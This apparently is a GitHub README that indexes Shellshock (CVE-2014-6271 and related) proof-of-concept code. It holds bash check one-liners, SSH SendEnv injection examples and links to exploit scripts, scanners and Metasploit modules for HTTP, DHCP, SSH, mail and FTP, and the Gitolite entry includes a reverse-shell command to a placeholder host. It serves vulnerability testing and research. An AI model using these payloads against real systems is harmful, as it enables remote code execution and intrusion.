Shellshocker - Repository of "Shellshock" Proof of Concept Code

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Please submit a pull request if you have more links or other resources

Speculation:(Non-confirmed possibly vulnerable)

XMPP(ejabberd)
~~Mailman~~ - confirmed not vulnerable
MySQL
NFS
Bind9
Procmail see
Exim see
Juniper Google Searchinurl:inurl:/dana-na/auth/url_default/welcome.cgi
- via: https://twitter.com/notsosecure/status/516132301025984512
- via: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
Cisco Gear
- via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
FreePB / Asterix patched here

If you know of PoCs for any of these, please submit an issue or pull request with a link.

Command Line (Linux, OSX, and Windows via Cygwin)

bashcheck - script to test for the latest vulns

CVE-2014-6271

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

CVE-2014-6277

will segfault if vulnerable

env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

IBM z/OS -

http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

HTTP

Metasploit Exploit Module - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Metasploit Exploit Module - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
Metasploit Exploit Module - IPFire Bash Environment Variable Injection (Shellshock)
HTTP Header Polution by @irsdl - http://pastebin.com/QNkf7dYS
HTTP CGI-BIN - http://pastebin.com/166f8Rjx
cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
F5 - https://twitter.com/securifybv/status/515035044294172673
Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
Commandline version - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
User-Agent based walkthrough with LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
User-Agent based walkthrough with Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
User-Agent based but supports Tor and Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
User-Agent based in Ruby - https://github.com/securusglobal/BadBash
Header based simple scanner using sleep with multithread support - https://github.com/gry/shellshock-scanner
shocker - Checks across a list of URLs in a file, or a single URL, against a list of known vulnerable CGI resources (Content-type Method)
Xymon - https://lists.xymon.com/archive/2014-September/040350.html
QNAP - https://www.exploit-db.com/exploits/36503

Phusion Passenger

https://news.ycombinator.com/item?id=8369776

DHCP

Trusted sec exploitation via Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
Metasploit Exploit Module - Dhclient Bash Environment Variable Injection (Shellshock)
Metasploit Auxiliary Module - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
Perl Script - http://pastebin.com/S1WVzTv9
using a Wi-Fi pineapple to force people to join the network - http://d.uijn.nl/?p=32

SSH

Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
- https://twitter.com/JZdziarski/status/515205581226123264/photo/1
SendEnv: LC_X='() { :; }; echo vulnerable' ssh foo@bar.org -o SendEnv=LC_X
Gitolite - https://twitter.com/Grifo/status/515089986161766400
- $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
- (necessary to have a git account on the server)

OSX

Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
Fix: http://support.apple.com/kb/DL1769

OSX - with reverse DNS (CVE-2014-3671.txt)

Example zone file: in-addr.arpa that contains a CVE-2014-6271 example.
Example file with a getnameinfo() that passes on to setenv(): osx-rev-ptr.c
- Advisory with description of above CVE-2014-3671.txt

SIP

SIP Proxies: https://github.com/zaf/sipshock

Qmail

Detailed walkthrough - http://marc.info/?l=qmail&m=141183309314366&w=2
Tweet from @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392
- http://twitpic.com/ec3615
- http://twitpic.com/ec361o

Postfix

http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

FTP

Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
Metasploit Exploit Module - Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

OpenVPN

OpenVPN - https://news.ycombinator.com/item?id=8385332
PoC Walkthrough by @fj33r - http://sprunge.us/BGjP

Oracle

Alert and list of affected Products

TMNT

https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

Hand

Via @DJManilaIce - http://pastie.org/9601055


user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
       __ __
      /  V  \ 
 _    |  |   |
/ \   |  |   |
|  |  |  |   |
|  |  |  |   |
|  |__|  |   |
|  |  \  |___|___
|  \   |/        \ 
|   |  |______    |
|   |  |          |
|   \__'   /     |
\        \(     /
 \             /
  \|            |



## CUPS
+ Metasploit Exploit Module - [CUPS Filter Bash Environment Variable Code Injection](https://github.com/rapid7/metasploit-framework/pull/4050)

## IRC
+ Metasploit Exploit Module - [Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/xdh_x_exec.rb)
+ Metasploit Exploit Module - [Legend Perl IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/legend_bot_exec.rb)

## Scripts from @primalsec
+ `shell_shocker.py` - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)
+ `w3af_shocker.py` - Automates the process of running a w3af spider/shell\_shock scan (User-Agent Method)
+ `shell_sprayer.py` - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)

mubix / shellshocker-pocs

readme